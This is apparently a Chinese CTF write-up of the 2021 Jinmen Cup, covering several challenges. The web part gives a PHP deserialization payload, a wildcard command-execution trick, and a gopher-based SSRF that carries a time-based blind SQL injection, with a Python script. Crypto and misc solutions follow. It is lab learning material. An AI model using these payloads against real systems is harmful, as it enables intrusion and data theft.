其他分享
首页 > 其他分享> > 2021津门杯web部分复现

2021津门杯web部分复现

作者:互联网

Web

1、power_out

通过分析(停电)可以知道可能是有备份文件或者编辑器异常退出时保存的记录。
扫描目录或者查看常见的目录
vim编辑器备份文件

.index.php.swp(找到文件下载)
.index.php.swo
.index.php.swn

发现乱码

b0VIM 7.4      o慲? 4   root                                    7fa16b649c4b                            /var/www/html/img/index.php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
 3210    #"! U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 tp           ?                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             ad  %
  =     ?       ?  ?  ?  ?  ?  ?  ?  i  7  	  ?  ?  ?  ?  ?  ?  t  U  @  :  7    ?  ?  ?  ?  ?  ?  ?  ?  ?  x
  r
  q
  X
  1
  
  ?  ?  ?  ?  ~  i  c  b  G  &             ?  ?  ?  ?  ?  ?  ?  ?  M  E  =  <                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       </html> </body> <p><br/>鏄ㄥぉ鏅氫笂鍥犱负14绾уぇ椋庡仠鐢典簡.</p> <body> <html>  ?>  $log_unser = unserialize($log); $log = str_replace('flag','',$log); $log = preg_replace("/[<>*#'|?\n ]/","",$log); $log = $_GET['log'];  }      }         echo "this is destruct";     function __destruct(){      }         return $str;         $str=str_replace('flag','',$str);         $str=preg_replace("/[<>*#'|?\n ]/","",$str);     public function waf($str){      }         $obj = new logger($this->weblogfile);         // self::waf($this->filepath);     function __wakeup(){      }     	echo "$flag";     	$flag="system('cat /flag')";     function __construct() {      public $weblogfile; class weblog {  }     }         echo "this is destruct";     function __destruct(){        }         fclose($fd);         fwrite($fd,$msg."\n");         $fd=fopen($this->logFile,"a+");     function log($msg){        }                  readfile($this->logFile);         $this->logFile =  $file;         $this->exitMsg="#--session end--#\n";         $this->initMsg="#--session started--#\n";         // initialise variables     function __construct($file){        public $exitMsg;     public $initMsg;     public $logFile; class logger{ <?php 

vim -r 恢复文件

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;

    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);

    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        echo "this is destruct";
    }
}

class weblog {
    public $weblogfile;

    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }

    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }

    function __destruct(){
        echo "this is destruct";
    }
}

class weblog {
    public $weblogfile;

    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }

    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }

    function __destruct(){
        echo "this is destruct";
    }

}

$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);

?>
<html>
<body>
<p><br/>昨天晚上因为14级大风停电了.</p>
</body>
</html>              

发现是反序列化,构造weblog类,通过readfile($this->logFile);得到flag
flag双写绕过

<?php

class weblog {
    public $weblogfile = '/flflagag';

    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }
}

$a = new weblog();

echo serialize($a);

O:6:“weblog”:1:{s:10:“weblogfile”;s:9:"/flflagag";}

2、hate_php

发现是命令执行,发现字母,数字、$、等被过滤了,通过<?= ?>可绕过,
使用通配符读取文件,cat命令在usr/bin/cat,网站根目录一般在/var/www/html/所以可以直接用通配符读取网站内容。`

<?=`/???/???/ /???/???/????` ?>

然而找了半天没找到,进一步扩大范围

<?=`/???/???/ /???` ?>

哦豁找到了,就在这。
(刚开始思路是无数字字母,构造命令,结果试半天好像不行。哪有通配符来的快haha)

easy_sql


<?php
highlight_file(__FILE__);
    session_start();
    $url = $_GET['url'] ?? false;
    if($url)
    {
    $a = preg_match("/file|dict/i", $url);
        if ($a==1)
        {
            exit();
        }

            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_exec($ch);
            curl_close($ch);
     }

?>

刚开始是想ssrf利用gopher打mysql,但是没有用户名,爆破也没成功,无奈放弃。。。
具体参考大佬的博客 宸极实验室
同时目录扫描发现admin.php
结合题目为easysql
猜测为admin.php进行post注入

http://122.112.251.23:20001/?url=gopher://127.0.0.1:80/_POST%2520%2fadmin.php%2520HTTP%2f1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%2fx-www-form-urlencoded%250D%250AContent-Length%253A%25207%250D%250A%250D%250Apoc%253D123%250D%250A

url=gopher://127.0.0.1:80/_POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
poc=123

最终得到有用payload为:
1) and sleep(10) and(1=1
之后就是写脚本进行盲注了,脚本如下:


# -*- coding: utf-8 -*-
import urllib
import requests
import time


flag='flag is :'
s = '0123456789abcdefghijklmnopqrstuvwxyz~!@#$%{}-_'

for i in range(100):
    for ss in s:
        payload = "poc=1)and if(substr((select user()),%d,1)='%s',sleep(5),0) and (1=1" % (i,ss)
#print(payload)
        test =\
"""POST /admin.php HTTP/1.1
Host:127.0.0.1
Accept: */* 
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close 

%s
""" % (len(payload),payload)
        tmp = urllib.parse.quote(test)
        new = tmp.replace('%0A','%0D%0A')
        new = new.replace('%','%25')
        result = '_'+new

        url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/'+result
        print(url)
        startTime=time.time()
        data= requests.get(url).content[3400:]
        if(time.time() - startTime > 5):
            flag += ss
            print flag

uploadhub

gooss

Crypto

1、RSA

小李截获一个RSA加密信息,能帮忙解开吗?
c=58703794202217708947284241025731347400180247075968200121227051434588274043273799724484183411072837136505848853313100468119277511144235171654313035776616454960333999039452491921144841080778960041199884823368775400603713982137807991048133794452060951251851183850000091036462977949122345066992308292574341196418

e=119393861845960762048898683511487799317851579948448252137466961581627352921253771151013287722073113635185303441785456596647011121862839187775715967164165508224247084850825422778997956746102517068390036859477146822952441831345548850161988935112627527366840944972449468661697184646139623527967901314485800416727
n=143197135363873763765271313889482832065495214476988244056602939316096558604072987605784826977177132590941852043292009336108553058140643889603639640376907419560005800390316898478577088950660088975625569277320455499051275696998681590010122458979436183639691126624402025651761740265817600604313205276368201637427

发现e,n很大,用师傅的

rsa-wiener-attack

在这里插入图片描述

MISC

混合编码

JTJGMTAyJTJGMTA4JTJGOTclMkYxMDMlMkYxMjMlMkYxMTMlMkY0OSUyRjEyMCUyRjc1JTJGMTEyJTJGMTA5JTJGNTYlMkYxMTglMkY3MyUyRjc2JTJGODclMkYxMTQlMkYxMDclMkYxMDklMkY4OCUyRjEyMCUyRjg2JTJGNTQlMkYxMDYlMkY0OSUyRjQ5JTJGNzclMkYxMDAlMkY5OSUyRjcxJTJGMTE2JTJGNzYlMkYxMjIlMkYxMTglMkY4MiUyRjEyMSUyRjg2JTJGMTI1

推测base64,先进行base64解码

%2F102%2F108%2F97%2F103%2F123%2F113%2F49%2F120%2F75%2F112%2F109%2F56%2F118%2F73%2F76%2F87%2F114%2F107%2F109%2F88%2F120%2F86%2F54%2F106%2F49%2F49%2F77%2F100%2F99%2F71%2F116%2F76%2F122%2F118%2F82%2F121%2F86

芜湖~
urldecode

/102/108/97/103/123/113/49/120/75/112/109/56/118/73/76/87/114/107/109/88/120/86/54/106/49/49/77/100/99/71/116/76/122/118/82/121/86

转ASCII
在这里插入图片描述

m1bmp

在这里插入图片描述
LSB隐写,base64解码可得flag

flag{l5DGqF1pPzOb2LU919LMaBYS5B1G01FD}

m0usb

12.pcapng
流量分析
发现是键盘信息,用脚本提取数据。
在这里插入图片描述
发现是一串数字,百度搜索是云影加密
在这里插入图片描述

标签:function,web,津门,__,flag,2021,str,public,log
来源: https://blog.csdn.net/weixin_44033675/article/details/116905572